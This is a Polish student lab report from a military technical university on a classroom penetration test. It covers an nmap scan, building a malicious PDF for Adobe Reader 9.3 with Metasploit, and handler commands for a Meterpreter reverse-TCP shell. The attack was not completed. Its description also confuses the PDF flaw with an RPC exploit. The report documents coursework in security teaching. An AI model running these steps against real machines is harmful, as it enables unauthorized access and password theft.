PBIÞmbek Szwal I1E1S1

WOJSKOWA AKADEMIA TECHNICZNA

PODSTAWY BEZPIECZEŃSTWA INFORMACJI

LABORATORIUM NR 1

Wykonali:
  • Karolina Dembek I1E1S1

  • Barbara Szwal I1E1S1

Treść zadania:

Na zajęciach laboratoryjnych należało wykonać następujące zadanie:

  1. Uruchomić system Backtrack z otrzymanej płyty, a następnie za pomocą narzędzia nmap przeskanować sieć lokalną w celu wyszukania komputerów z systemem operacyjnym innym niż Backtrack.

  2. Dostać się do hasła na komputerze osoby z zespołu wykonawczego

  3. Za pomocą exploit-a wersji Adobe Reader v9.3 spreparować plik PDF , który pozwoli nam na dostęp do komptera ofiary w celu przechwycenia hasła użytkownika.

  4. Wykorzystać exploit-a w celu zdalnej i nieautoryzowanej zmiany hasła na komputerze ofiary.

Opis narzędzi:

BackTrack to specjalistyczna dystrybucja Linuksa szczególnie ceniona wśród specjalistów IT i audytorów zabezpieczeń. Dystrybucja ta stanowi unikatowy zbiór kilkuset profesjonalnych, bardzo różnorodnych narzędzi do monitorowania i analizy ruchu sieciowego, zbierania informacji na temat sieci i znajdujących się w niej urządzeń, a także kontroli stanu zabezpieczeń sieci i ich łamania oraz przeprowadzania testów penetracyjnych. BackTrack zawiera wbudowane sterowniki do większości najpopularniejszych sieciowych kart bezprzewodowych, dzięki czemu można go uruchomić na praktycznie każdym notebooku i od razu przystąpić do pracy - bez instalacji na komputerze, bez pozostawiania jakichkolwiek śladów aktywności. Narzędzie nmap służy do skanowania sieci pod kątem otwartych portów oraz użytkowanych usług. Natomiast metasploit jest narzędziem wykorzystywanym do testów penetracyjnych i łamania zabezpieczeń systemów teleinformatycznych. Metasploit posiada bazę gotowych exploitów oraz udostępnia interfejs, dzięki któremu można przygotowywać własne, korzystając z gotowych komponentów. Exploit jako narzędzie pozwala poprzez wykorzystanie błędów i luki w oprogramowaniu na uzyskanie dostępu nad daną maszyną. Natomiast moduł adobe_libtiff jest w stanie wykorzystać krytyczny błąd w zabezpieczeniach programu adobe reader 9.3. Eksploatacja luki polega na wysłaniu do serwera specjalnie spreparowanego zapytania RPC, co może prowadzić do zdalnego wykonania kodu i w efekcie do przejęcia kontroli nad atakowanym systemem. Warunkiem udanego włamania jest brak
w systemie poprawki bezpieczeństwa KB921883.

Wykonanie:

Ćwiczenie rozpoczęłyśmy od uruchomienia komputera z płyty LiveCD z systemem BackTrack.
Po uruchomieniu systemu rozpoczęłyśmy poszukiwanie komputera ofiary w dostępnej sieci w pracowni za pomocą nmap:

„nmap –sS –p8080 10.5.233.255/24 –open

Gdzie poszczególne dane oznaczają:

Komputer, cel ataku posiadał adres IP 10.5.233.165 z uruchomionym systemem operacyjnym Windows XP.

Następnie uruchomiłyśmy środowisko metasploit za pomocą komendy msfconsole oraz przygotowałyśmy złośliwy plik PDF z exploitem adobe_libtiff za pomocą GUI. , który po uruchomieniu na komputerze ofiary umożliwiłby nasłuchiwanie w celu pozyskania hasła użytkownika.

Niestety nie udało nam się skopiować utworzonego pliku PDF na komputer ofiary, co uniemożliwiło dalsze wykonywanie ćwiczenia. Podjęłyśmy próbę przekazania pliku poprzez użycie portu USBx.x. Jednak maszyna wirtualna nie wykrywała urządzenia.

Dalsze postępowanie powinno przebiegać następująco:

svn update -aktualizacja środowiska Metasploit

use exploit/multi/handler – wejście w tryb konfiguracji modułu exploita

set RHOST X– ustawienie adresu IP ofiary(gdzie X- adres ip ofiary)

set LHOST Y– ustawienie adresu IP naszego systemu(gdzie Y-adres ip naszego systemu)

set LPORT 8080 – ustawienie wykorzystywanego portu

set PAYLOAD windows/meterpreter/reverse_tcp - wybór oraz wejście w tryb konfiguracji modułu payloadu

exploit - uruchomiemie exploitu

Wnioski:

Podczas ćwiczenia poznaliśmy możliwości BackTrack-a jako dystrybucji Linuxa zawierającej narzędzia do testowania I łamania zabezpieczeń systemów komputerowych. Wykorzystując słabość zabezpieczeń komputerów można uzyskać w dość łatwy sposób kontrolę nad nimi. Niestety podczas trwania laboratorium nie udało nam się uzyskać dostępu do komputera ofiary z przyczyn technicznych.

W naszym przypadku możliwość zaatakowania komputera ofiary była oparta o błędy
w oprogramowaniu Adobe Reader w wersji 9.3. Błędy te zostały usunięte przez firmę Adobe
w następnych wersjach oprogramowania.

Ćwiczenie zapoznało nas z możliwościami oprogramowania BackTrack oraz pokazało nam jak ważna jest dbałość o aktualizację oprogramowania systemowego ,które w początkowych wersjach jest podatne na ataki z zewnątrz.


Wyszukiwarka

Podobne podstrony:
Szwal I1E1S1 SKW 3
Szwal I1E1S1 SKW 1 x
Szwal I1E1S1 SKW 1 2 x
SZWAL SPRAWOZDANIE 5, Sieci Komputerowe
SZWAL SPRAWOZDANIE 4 ZAD B, Sieci Komputerowe
SZWAL SPRAWOZDANIE 4 ZAD A, Sieci Komputerowe
Barbara Szwal Sprawozdanie 1 (WEiP-2014), WAT, semestr VII, Wprowadzenie do ekonometrii i prognozowa
SZWAL SPRAWOZDANIE 2, Sieci Komputerowe
Barbara Szwal

więcej podobnych podstron